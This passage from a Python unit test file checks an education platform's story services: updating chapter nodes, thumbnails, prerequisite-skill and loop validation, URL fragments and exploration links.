'old_value': False,
'new_value': True
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': (
story_domain.INITIAL_NODE_ID),
'old_value': self.NODE_ID_1,
'new_value': self.NODE_ID_2
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'node_id': self.NODE_ID_2,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_FILENAME),
'old_value': None,
'new_value': 'image.svg'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'node_id': self.NODE_ID_2,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_BG_COLOR),
'old_value': None,
'new_value': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0]
})
]
# Save a dummy image on filesystem, to be used as thumbnail.
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.ENTITY_TYPE_STORY, self.STORY_ID))
fs.commit(
'%s/image.svg' % (constants.ASSET_TYPE_THUMBNAIL), raw_image,
mimetype='image/svg+xml')
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist, 'Added story node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(
story.story_contents.nodes[1].thumbnail_filename, 'image.svg')
self.assertEqual(
story.story_contents.nodes[1].thumbnail_size_in_bytes,
len(raw_image))
self.assertEqual(
story.story_contents.nodes[1].thumbnail_bg_color,
constants.ALLOWED_THUMBNAIL_BG_COLORS['chapter'][0])
self.assertEqual(
story.story_contents.nodes[1].destination_node_ids,
[self.NODE_ID_1])
self.assertEqual(
story.story_contents.nodes[1].outline_is_finalized, True)
self.assertEqual(story.story_contents.nodes[1].title, 'Title 2')
self.assertEqual(
story.story_contents.nodes[1].description, 'Description 2')
self.assertEqual(story.story_contents.initial_node_id, self.NODE_ID_2)
self.assertEqual(story.story_contents.next_node_id, 'node_3')
self.assertEqual(story.version, 3)
story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID)
self.assertEqual(story_summary.node_titles, ['Title 1', 'Title 2'])
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_1
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': self.NODE_ID_2,
'old_value': True,
'new_value': False
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_TITLE),
'node_id': self.NODE_ID_2,
'old_value': 'Title 2',
'new_value': 'Modified title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESCRIPTION),
'node_id': self.NODE_ID_2,
'old_value': 'Description 2',
'new_value': 'Modified description 2'
}),
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Removed a story node.')
story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID)
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story_summary.node_titles, ['Modified title 2'])
self.assertEqual(
story.story_contents.nodes[0].title, 'Modified title 2')
self.assertEqual(
story.story_contents.nodes[0].description, 'Modified description 2')
self.assertEqual(story.story_contents.nodes[0].destination_node_ids, [])
self.assertEqual(
story.story_contents.nodes[0].outline_is_finalized, False)
def test_prerequisite_skills_validation(self):
self.story.story_contents.next_node_id = 'node_4'
node_1 = {
'id': 'node_1',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 1',
'description': 'Description 1',
'destination_node_ids': ['node_2', 'node_3'],
'acquired_skill_ids': ['skill_2'],
'prerequisite_skill_ids': ['skill_1'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_2 = {
'id': 'node_2',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 2',
'description': 'Description 2',
'destination_node_ids': [],
'acquired_skill_ids': ['skill_3'],
'prerequisite_skill_ids': ['skill_2'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_3 = {
'id': 'node_3',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 3',
'description': 'Description 3',
'destination_node_ids': [],
'acquired_skill_ids': [],
'prerequisite_skill_ids': ['skill_4'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.story.story_contents.initial_node_id = 'node_1'
self.story.story_contents.nodes = [
story_domain.StoryNode.from_dict(node_1),
story_domain.StoryNode.from_dict(node_2),
story_domain.StoryNode.from_dict(node_3)
]
expected_error_string = (
'The skills with ids skill_4 were specified as prerequisites for '
'Chapter Title 3, but were not taught in any chapter before it')
with self.assertRaisesRegexp(
utils.ValidationError, expected_error_string):
story_services.validate_prerequisite_skills_in_story_contents(
self.story.corresponding_topic_id, self.story.story_contents)
def test_story_with_loop(self):
self.story.story_contents.next_node_id = 'node_4'
node_1 = {
'id': 'node_1',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 1',
'description': 'Description 1',
'destination_node_ids': ['node_2'],
'acquired_skill_ids': ['skill_2'],
'prerequisite_skill_ids': ['skill_1'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_2 = {
'id': 'node_2',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 2',
'description': 'Description 2',
'destination_node_ids': ['node_3'],
'acquired_skill_ids': ['skill_3'],
'prerequisite_skill_ids': ['skill_2'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_3 = {
'id': 'node_3',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 3',
'description': 'Description 3',
'destination_node_ids': ['node_2'],
'acquired_skill_ids': ['skill_4'],
'prerequisite_skill_ids': ['skill_3'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.story.story_contents.nodes = [
story_domain.StoryNode.from_dict(node_1),
story_domain.StoryNode.from_dict(node_2),
story_domain.StoryNode.from_dict(node_3)
]
expected_error_string = 'Loops are not allowed in stories.'
with self.assertRaisesRegexp(
utils.ValidationError, expected_error_string):
story_services.validate_prerequisite_skills_in_story_contents(
self.story.corresponding_topic_id, self.story.story_contents)
def test_does_story_exist_with_url_fragment(self):
story_id_1 = story_services.get_new_story_id()
story_id_2 = story_services.get_new_story_id()
self.save_new_story(
story_id_1, self.USER_ID, self.TOPIC_ID, url_fragment='story-one')
self.save_new_story(
story_id_2, self.USER_ID, self.TOPIC_ID, url_fragment='story-two')
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, story_id_1)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, story_id_2)
self.assertTrue(
story_services.does_story_exist_with_url_fragment('story-one'))
self.assertTrue(
story_services.does_story_exist_with_url_fragment('story-two'))
self.assertFalse(
story_services.does_story_exist_with_url_fragment('story-three'))
def test_update_story_with_invalid_corresponding_topic_id_value(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_story(story_id, self.USER_ID, topic_id)
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
})
]
with self.assertRaisesRegexp(
Exception, (
'Expected story to only belong to a valid topic, but '
'found no topic with ID: %s' % topic_id)):
story_services.update_story(
self.USER_ID, story_id, changelist, 'Added node.')
def test_update_story_which_not_corresponding_topic_id(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_topic(
topic_id, self.USER_ID, name='A New Topic',
abbreviated_name='new-topic', url_fragment='new-topic',
description='A new topic description.',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0)
self.save_new_story(story_id, self.USER_ID, topic_id)
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
})
]
with self.assertRaisesRegexp(
Exception, (
'Expected story to belong to the topic %s, but it is '
'neither a part of the canonical stories or the '
'additional stories of the topic.' % topic_id)):
story_services.update_story(
self.USER_ID, story_id, changelist, 'Added node.')
def test_delete_story(self):
story_services.delete_story(self.USER_ID, self.STORY_ID)
self.assertEqual(story_fetchers.get_story_by_id(
self.STORY_ID, strict=False), None)
self.assertEqual(
story_fetchers.get_story_summary_by_id(
self.STORY_ID, strict=False), None)
def test_cannot_get_story_from_model_with_invalid_schema_version(self):
story_model = story_models.StoryModel.get(self.STORY_ID)
story_model.story_contents_schema_version = 0
story_model.commit(self.USER_ID, 'change schema version', [])
with self.assertRaisesRegexp(
Exception,
'Sorry, we can only process v1-v%d story schemas at '
'present.' % feconf.CURRENT_STORY_CONTENTS_SCHEMA_VERSION):
story_fetchers.get_story_from_model(story_model)
def test_get_story_summaries_by_ids(self):
story_summaries = story_fetchers.get_story_summaries_by_ids(
[self.STORY_ID])
self.assertEqual(len(story_summaries), 1)
self.assertEqual(story_summaries[0].id, self.STORY_ID)
self.assertEqual(story_summaries[0].title, 'Title')
self.assertEqual(story_summaries[0].description, 'Description')
self.assertEqual(story_summaries[0].language_code, 'en')
self.assertEqual(story_summaries[0].node_titles, ['Title 1'])
self.assertEqual(story_summaries[0].thumbnail_filename, None)
self.assertEqual(story_summaries[0].thumbnail_bg_color, None)
self.assertEqual(story_summaries[0].version, 2)
def test_cannot_update_story_with_non_story_change_changelist(self):
observed_log_messages = []
def _mock_logging_function(msg, *args):
"""Mocks logging.error()."""
observed_log_messages.append(msg % args)
logging_swap = self.swap(logging, 'error', _mock_logging_function)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Expected change to be of type StoryChange')
with logging_swap, assert_raises_regexp_context_manager:
story_services.update_story(
self.USER_ID, self.STORY_ID, [{}], 'Updated story node.')
self.assertEqual(
observed_log_messages,
[
'Exception Expected change to be of type StoryChange %s [{}]'
% self.STORY_ID
]
)
def test_update_story_node_outline(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].outline, '')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_OUTLINE),
'node_id': 'node_1',
'old_value': '',
'new_value': 'new_outline'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story outline.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].outline, 'new_outline')
def test_cannot_update_story_node_outline_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_OUTLINE),
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_outline'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story outline.')
def test_cannot_update_story_with_no_commit_message(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESCRIPTION),
'node_id': self.NODE_ID_1,
'old_value': '',
'new_value': 'New description.'
})]
with self.assertRaisesRegexp(
Exception,
'Expected a commit message but received none.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, None)
def test_update_story_acquired_skill_ids(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].acquired_skill_ids, [])
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_ACQUIRED_SKILL_IDS),
'node_id': 'node_1',
'old_value': [],
'new_value': ['skill_id']
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story acquired_skill_ids.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(
story.story_contents.nodes[0].acquired_skill_ids, ['skill_id'])
def test_exploration_context_model_is_modified_correctly(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': [self.NODE_ID_2]
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Added node.')
self.save_new_valid_exploration(
'0', self.user_id_admin, title='Title 1',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.save_new_valid_exploration(
'1', self.user_id_admin, title='Title 2',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.save_new_valid_exploration(
'2', self.user_id_admin, title='Title 3',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_admin, '0')
self.publish_exploration(self.user_id_admin, '1')
self.publish_exploration(self.user_id_admin, '2')
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('0'))
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('1'))
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': '1'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('0'), self.STORY_ID)
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': '1',
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': '2',
'new_value': '1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': '0',
'new_value': '2'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('0'))
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID)
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('2'), self.STORY_ID)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': '2',
'new_value': '0'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': '1',
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_2
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_3',
'title': 'Title 2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': ['node_3']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_3',
'old_value': None,
'new_value': '1'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('0'), self.STORY_ID)
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID)
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('2'))
story_services.delete_story(self.USER_ID, self.STORY_ID)
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('0'))
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('1'))
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('2'))
self.save_new_story('story_id_2', self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, 'story_id_2')
# Creates node 1 -> node 2 -> node 3, links exp IDs 0, 1 and 2 with them
# respectively. Then, deletes 2, 3, adds node 4 (node 1 -> node 4),
# deletes it and adds node 5 (node 1 -> node 5).
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_1',
'title': 'Title 1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_2',
'title': 'Title 2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_3',
'title': 'Title 3'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': ['node_2']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_2,
'old_value': [],
'new_value': ['node_3']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': '1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_3',
'old_value': None,
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_2
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': 'node_3'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_4',
'title': 'Title 4'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_4',
'old_value': None,
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': 'node_4'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_5',
'title': 'Title 5'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': 'node_1',
'old_value': ['node_2'],
'new_value': ['node_5']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_5',
'old_value': None,
'new_value': '1'
})]
story_services.update_story(
self.USER_ID, 'story_id_2', change_list, 'Updated story node.')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('0'), 'story_id_2')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), 'story_id_2')
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('2'))
def test_exploration_story_link_collision(self):
self.save_new_story('story_id_2', self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, 'story_id_2')
self.save_new_valid_exploration(
'0', self.user_id_admin, title='Title 1',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_admin, '0')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
})]
with self.assertRaisesRegexp(
Exception,
'The exploration with ID 0 is already linked to story '
'with ID %s' % self.STORY_ID):
story_services.update_story(
self.USER_ID, 'story_id_2', change_list,
'Added chapter.')
def test_cannot_update_story_acquired_skill_ids_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_ACQUIRED_SKILL_IDS),
'node_id': 'invalid_node',
'old_value': [],
'new_value': ['skill_id']
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story acquired_skill_ids.')
def test_update_story_notes(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.notes, 'Notes')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_NOTES,
'old_value': 'Notes',
'new_value': 'New notes'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story notes.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.notes, 'New notes')
def test_update_story_language_code(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.language_code, 'en')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_LANGUAGE_CODE,
'old_value': 'en',
'new_value': 'bn'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story language_code.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.language_code, 'bn')
def test_update_story_url_fragment(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.url_fragment, 'title')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_URL_FRAGMENT,
'old_value': 'title',
'new_value': 'updated-title'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story url_fragment.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.url_fragment, 'updated-title')
def test_cannot_update_story_if_url_fragment_already_exists(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_story(
story_id, self.USER_ID, topic_id,
title='original', url_fragment='original')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_URL_FRAGMENT,
'old_value': 'title',
'new_value': 'original'
})]
exception_message = 'Story Url Fragment is not unique across the site.'
with self.assertRaisesRegexp(Exception, exception_message):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story url_fragment.')
def test_cannot_update_story_with_no_change_list(self):
with self.assertRaisesRegexp(
Exception,
'Unexpected error: received an invalid change list when trying to '
'save story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, [], 'Commit message')
def test_cannot_update_story_with_invalid_exploration_id(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'invalid_exp_id'
})]
with self.assertRaisesRegexp(
Exception, 'Expected story to only reference valid explorations'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_validate_exploration_throws_an_exception(self):
observed_log_messages = []
def _mock_logging_function(msg):
"""Mocks logging.exception()."""
observed_log_messages.append(msg)
def _mock_validate_function(_exploration, _strict):
"""Mocks logging.exception()."""
raise Exception('Error in exploration')
logging_swap = self.swap(logging, 'exception', _mock_logging_function)
validate_fn_swap = self.swap(
exp_services, 'validate_exploration_for_story',
_mock_validate_function)
with logging_swap, validate_fn_swap:
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title',
category='Category 1', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
with self.assertRaisesRegexp(
Exception, 'Error in exploration'):
story_services.validate_explorations_for_story(
['exp_id_1'], False)
self.assertItemsEqual(
observed_log_messages, [
'Exploration validation failed for exploration with '
'ID: exp_id_1. Error: Error in exploration'])
def test_validate_exploration_returning_error_messages(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
validation_error_messages = (
story_services.validate_explorations_for_story(
['invalid_exp', 'exp_id_1'], False))
message_1 = (
'Expected story to only reference valid explorations, but found '
'a reference to an invalid exploration with ID: invalid_exp')
message_2 = (
'Exploration with ID exp_id_1 is not public. Please publish '
'explorations before adding them to a story.'
)
self.assertEqual(validation_error_messages, [message_1, message_2])
def test_cannot_update_story_with_private_exploration_id(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})]
with self.assertRaisesRegexp(
Exception, 'Exploration with ID exp_id_1 is not public'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_blank_exp_id(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': self.EXP_ID,
'new_value': None
})]
with self.assertRaisesRegexp(
Exception, 'Story node with id node_1 does not contain an '
'exploration id.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_different_categories(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
self.save_new_valid_exploration(
'exp_id_2', self.user_id_a, title='title', category='Category 2',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_2')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
}),
story_domain.StoryChange({
